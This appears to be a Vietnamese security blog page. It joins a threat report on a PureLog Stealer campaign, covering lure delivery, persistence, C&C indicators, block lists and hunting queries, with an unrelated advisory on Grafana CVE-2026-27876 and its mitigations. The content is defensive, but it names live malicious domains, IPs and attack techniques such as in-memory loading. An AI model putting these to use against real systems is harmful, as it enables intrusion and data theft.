Hình 2. Malicious lure được tải về từ nguồn không xác định qua Chrome

File ZIP ban đầu được tải về qua Chrome từ:

hxxps://cdn[.]eideasrl[.]it/Notice%20of%20Alleged%20Violation%20of%20Intellectual%20Property%20Rights_1770380091603[.]zip

Process và persistence

Hình 3. Malware thiết lập persistence trên hệ thống

Python DLL và PYD files tạo dưới C:\Users\Public\Windows\:

C:\Users\Public\Windows\python314.dll
C:\Users\Public\Windows\DLLs\_ctypes.pyd
C:\Users\Public\Windows\DLLs\libffi-8.dll
C:\Users\Public\Windows\DLLs\_hashlib.pyd
C:\Users\Public\Windows\DLLs\libcrypto-3.dll
C:\Users\Public\Windows\DLLs\_socket.pyd
C:\Users\Public\Windows\DLLs\_ssl.pyd
C:\Users\Public\Windows\DLLs\libssl-3.dll

Antivirus enumeration

Hình 4. Antivirus enumeration trên hệ thống nạn nhân

Process injection

Hình 5. Process injection attempt nhắm vào svchost.exe

Machine fingerprint

Hình 7. CyberChef recipe để extract machine fingerprint

Hình 8. Machine fingerprint sau khi decode

C&C attribution

Hình 10. VirusTotal liên kết IP 166.0.184.127 với PureLog Stealer, instructions.pdf được quan sát giao tiếp với C&C server này

GZip payload và decoding

Hình 6. Trend Micro Vision One telemetry cho thấy GZip Payload

Payload fingerprint được decode theo pipeline:

1. Base64 Decode chuỗi ban đầu

2. GZip Decompress ra dữ liệu có GZip header

3. Protobuf Deserialize theo schema Protocol Buffers

Nhận định

Chiến dịch này minh họa một trend đáng quan ngại trong infostealer ecosystem: threshold kỹ thuật để triển khai multi-stage fileless attack đang ngày càng thấp. PureLog Stealer là công cụ low-cost, nhưng delivery chain ở đây có độ tinh vi ngang với nhiều APT campaign — infrastructure-controlled decryption, dual-loader redundancy, reflective CLR loading, và anti-forensics tích hợp ngay trong loader.

Điểm đặc biệt cần lưu ý: thiết kế "khóa giải mã từ xa" không chỉ cản trở phân tích mà còn cho phép operator tắt toàn bộ campaign ngay lập tức bằng cách đơn giản là xóa key endpoint. Điều này đồng nghĩa với việc incident responder có thể không thu thập được payload ngay cả khi đã có sample của các stage trước — đúng như Trend Micro gặp phải khi không thể lấy instructions.pdf trong lần response đầu.

Từ góc độ SOC, việc này nhấn mạnh tại sao memory forensics và network telemetry quan trọng hơn disk artifact. Trong môi trường fileless, các chỉ số đáng tin cậy nhất không phải là file hash mà là: network connection pattern (custom User-Agent, domain pattern), in-memory .NET assembly load, và bất thường trong registry Run key.

Việc chiến dịch kết hợp cả phishing email lẫn Google Ads malvertising cũng đáng lưu ý — nó mở rộng attack surface ra ngoài inbox, bao gồm cả người dùng tìm kiếm trên Google. Các tổ chức chỉ training nhân viên về "đừng click link trong email" chưa đủ bao phủ vector này.

Khuyến nghị

Immediate (0–24h)

• Block các C&C domain và IP đã xác định trên firewall/proxy:

  quickdocshare[.]com
  dq[.]bestshoppingday[.]com
  logs[.]bestshopingday[.]com
  mh[.]bestshopingday[.]com
  logs[.]bestsaleshoppingday[.]com
  166[.]0[.]184[.]127
  

• Tìm kiếm custom User-Agent curl/meow_meow trong proxy log và network flow — đây là indicator đơn giản nhưng khá độc nhất, ít false positive

• Kiểm tra registry key HKCU\...\Run với value name SystemSettings trỏ đến path không nằm trong C:\Windows\System32\

Short-term (1–7 ngày)

• Chạy hunting query trên toàn bộ fleet:

  detectionName:*PURELOGSSTEALER*
  

• Hunt thêm với pattern file system:

  endpointHostName:[TARGET] AND ("*document.pdf*" OR "*instructions.pdf*" OR "*invoice.pdf*")
  

• Kiểm tra process list tìm svchost.exe chạy từ path ngoài C:\Windows\System32\ — đặc biệt trong C:\Users\Public\

• Review alert về Assembly.Load() từ process không phải .NET IDE hay development tool

• Train người dùng nhận diện lure vi phạm bản quyền — không chỉ qua email mà cả qua search result/ads

Long-term

• Triển khai behavioral detection cho in-memory .NET loading pattern — rule trigger trên AmsiScanBuffer patch attempt hoặc AppDomain.Load_3() call từ process không thuộc whitelist

• Xem xét script-level logging (PowerShell Script Block Logging + AMSI logging) để capture obfuscated script execution

• Với tổ chức có môi trường y tế hoặc chính phủ: ưu tiên review network egress rule, đặc biệt cho các request với User-Agent pattern bất thường hoặc curl-based download từ endpoint không thuộc whitelist

Hunting Queries & IOC

Trend Micro Vision One

detectionName:*PURELOGSSTEALER*

SIEM generic (Elastic/Splunk syntax)

# Network: custom curl User-Agent
user_agent:"curl/meow_meow"

# File system: svchost.exe ngoài System32
file.path:"C:\Users\Public\Windows\svchost.exe"

# Registry persistence
registry.key:*CurrentVersion\Run* AND registry.value.name:SystemSettings

# Process: Python giả dạng svchost
process.name:svchost.exe AND process.executable:*Public*

Hashes (SHA256)

svchost.exe (Python renamed) — SHA1

f4532fc1e5d53a732fcc883f7125ceb06b985048

IP và Domain

Domains:
  quickdocshare[.]com
  dq[.]bestshoppingday[.]com
  logs[.]bestshopingday[.]com
  mh[.]bestshopingday[.]com
  logs[.]bestsaleshoppingday[.]com

IP Addresses:
  166[.]0[.]184[.]127  — PureLog Stealer C&C
  64[.]40[.]154[.]96   — Tier.Net Technologies LLC
  172[.]64[.]80[.]1    — Cloudflare (CDN, thấp giá trị)

Nguồn tham khảo:

• Lures Mask a Multi-Stage PureLog Stealer Attack on Key Industries — Trend Micro Research
• Don't Judge a PNG by Its Header: PURELOGS Infostealer Analysis — Swiss Post Cybersecurity
• Attackers Hide Infostealer in Copyright Infringement Notices — Dark Reading
• Inside the Infostealer Economy: Credential Threats in 2025 — Recorded Future
• Agentic Attack Chains Advance as Infostealers Flood Criminal Markets — Help Net Security / Flashpoint

Thông tin chi tiết

• Định danh lỗ hổng: CVE-2026-27876

• Điểm CVSS (3.1): 9.1

• Mức độ nghiêm trọng: CRITICAL - Cực kỳ nghiêm trọng

• Mô tả: Chuỗi tấn công sử dụng kết hợp các lệnh SQL (SQL Expressions) và plugin của Grafana Enterprise dẫn đến tấn công thực thi mã từ xa (RCE). Lỗ hổng bắt nguồn từ tính năng sqlExpressions trong phiên bản Grafana OSS, do đó tất cả quản trị viên và người dùng đều được khuyến nghị cập nhật bản vá mới nhất để ngăn chặn nguy cơ bị tấn công trong tương lai.

• Phiên bản bị ảnh hưởng: Grafana phiên bản < 11.6.0, < 12.1.0 và >= 12.4.2

Grafana là một nền tảng mã nguồn mở, hỗ trợ truy vấn, phân tích, hiển thị trực quan hoá và cảnh báo dữ liệu tới quản trị viên từ nhiều nguồn dữ liệu khác nhau, cung cấp cho người dùng một cái nhìn tổng quan về hiệu suất của hệ thống theo thời gian thực.

Grafana được sử dụng thông dụng, đóng vai trò là "đôi mắt" của hệ thống giám sát SOC hoặc DevOps:

• Giám sát lưu lượng mạng: Grafana hỗ trợ theo dõi các luồng dữ liệu bất thường, giúp phát hiện sớm các dấu hiệu của Botnet hoặc tấn công từ chối dịch vụ DoS/DDoS.

• Quản lý log: kết hợp với Elasticsearch hoặc Loki để quản lý log, hiển thị các log hành vi truy cập bất thường như truy cập trái phép vào máy chủ.

• Theo dõi sức khoẻ hệ thống: Giám sát tài nguyên các máy chủ vật lý, các máy ảo hoặc các container để đảm bảo hệ thống luôn hoạt động ổn định.

Vừa qua, nền tảng mã nguồn mở này vừa trở thành tâm điểm quan tâm của cộng đồng an ninh mạng do sự xuất hiện của CVE-2026-27876, cho phép tin tặc khai thác để đạt được khả năng thực thi mã từ xa.

Theo Grafana Labs, lỗ hổng xuất phát từ tính năng SQL expressions trong Grafana, cho phép biến đổi dữ liệu truy vấn bằng cú pháp SQL thông dụng. Tuy nhiên, các cú pháp này cũng cho phép ghi tệp tuỳ ý vào hệ thống tệp của máy chủ. Lợi dụng điều này, kẻ tấn công có thể kết hợp nhiều phương thức khai thác khác nhau để đạt được quyền thực thi mã trên hệ thống mục tiêu thông qua mạng internet.

Mặt khác, Grafana Labs cũng thông tin thêm, để khai thác thành công CVE-2026-27876 cần phải đạt được 2 yếu tố sau:

• Kẻ tấn công có quyền Viewer hoặc cao hơn để thực thi các truy vấn tới nguồn dữ liệu.

• Tính năng sqlExpressions trên hệ thống mục tiêu phải ở trạng thái bật (enable).

Khi các điều kiện trên được đáp ứng, kẻ tấn công có thể tuỳ ý ghi đè (overwrite) driver Sqlyze hoặc chỉnh sửa, thêm các lệnh độc hại trong tệp cấu hình nguồn dữ liệu triển khai AWS, thiết lập kết nối SSH bền vững tới máy chủ Grafana mục tiêu để chiếm hoàn toàn quyền thực thi mã từ xa.

Mặt khác, Grafana Labs cũng thông báo về một lỗ hổng nghiêm trọng khác với định danh CVE-2026-27880 đạt 7.5 trên thang điểm CVSS (3.1), cho phép tin tặc lợi dụng, kết hợp với lỗ hổng trên làm quá tải hệ thống bằng các request có kích thước size rất lớn, gây tình trạng từ chối dịch vụ cho Grafana, ảnh hưởng đến các dịch vụ giám sát cũng như các hoạt động an ninh mạng trong tổ chức, doanh nghiệp.

Khắc phục & Khuyến nghị

Các nhà bảo mật thuộc Grafana Labs khuyến nghị quản trị viên và người dùng nên:

• Cập nhật bản vá: Cập nhật Grafana lên phiên bản mới nhất để tránh nguy cơ mất an toàn bảo mật do lỗ hổng này gây ra.

• Vô hiệu hoá sqlExpressions: Tắt tính năng để vô hiệu hoá một điều kiện cho phép kẻ tấn công có thể khai thác CVE-2026-27876.

• Vô hiệu hoá các nguồn AWS đã cài đặt: Nếu người dùng triển khai Sqlyze, cần thực hiện lên phiên bản mới hơn 1.5.0 hoặc vô hiệu hoá Sqlyze. Mặc khác vô hiệu hoá hoàn toàn các nguồn dữ liệu AWS đã được cài đặt.

• Triển khai Grafana trong môi trường High Availability (HA): triển khai đồng thời trong môi trường HA kết hợp với tính năng tự động khởi động lại (automatic restart)

• Thiết lập Reverse Proxy: Triển khai Reverse Proxy đứng trước Grafana để giới hạn nghiêm ngặt kích thước payload đầu vào như Cloudflare hay Nginx.

Tham khảo

1. CVE-2026-27876

2. Grafana security release